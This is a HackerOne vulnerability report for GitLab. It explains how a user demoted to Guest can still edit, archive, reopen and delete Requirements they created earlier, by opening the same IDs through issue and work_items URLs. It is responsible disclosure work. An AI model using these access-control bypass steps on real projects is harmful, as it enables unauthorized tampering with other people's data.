Demoted Guest user can change Title, Description, Archive/Reopen and Delete Requirements via Issues
HackerOne report #2123430 by toukakirishima
on 2023-08-25, assigned to @greg:
Report | Attachments | How To Reproduce
Report
Summary
I found a IDOR vulnerability when visit issues
path, as an attacker I can change Title, Description, Archive/Reopen and Delete Requirements via Issues.
Normally you can't change Title, Description, Archive/Reopen and Delete Requirements as Guest role even though you made it.
And if you edit the title or description via graphql you will see a warning message (The resource that you are attempting to access does not exist or you don't have permission to perform this action
)
But as an attacker I can change Title, Description, Archive/Reopen and Delete Requirements as Guest role
According to the following article member must have at least the Reporter role to edit a requirement.
You must have at least the Reporter role.
According to the following article member must have at least the Reporter role to archive a requirement.
You must have at least the Reporter role.
According to the following article member must have at least the Reporter role to reopen a requirement.
You must have at least the Reporter role.
And there is no documentation if requirement can be removed.
NOTE
This vulnerability only applies to (attacker) when making requirements (before the attacker becomes a Guest role).
Let's say Touka Attacker (Reporter Role) is the attacker and Touka Kirishima is the victim.
And Touka Attacker (attacker) create requirement and then revealed to Guest Role.
Steps to reproduce
- Go to Requirements and choose that you have made and copy the ID. Example ID: 16
- Go to Issues URL and paste ID. Example : https://gitlab.com/toukak2/zzzz/-/issues/16
- Edit then save change, and now you successfully edit title, description, and archive/reopen Requirements.
- To remove the Requirements change the URL to work_items. Example : https://gitlab.com/toukak2/zzzz/-/work_items/16
- Delete Requirements and now you successfully delete the Requirements
POC
bandicam_2023-08-25_20-14-33-409.mp4
Output of checks
This bug happens on GitLab.com
Impact
Attacker can still change Title, Description, Archive/Reopen and Delete Requirements via Issues even though the attacker has been revealed to be the Guest role.
Attachments
Warning: Attachments received through HackerOne, please exercise caution!
- image.png
- image.png
- image.png
- image.png
- image.png
- image.png
- image.png
- image.png
- image.png
- image.png
- bandicam_2023-08-25_20-14-33-409.mp4
- image.png
How To Reproduce
Please add reproducibility information to this section: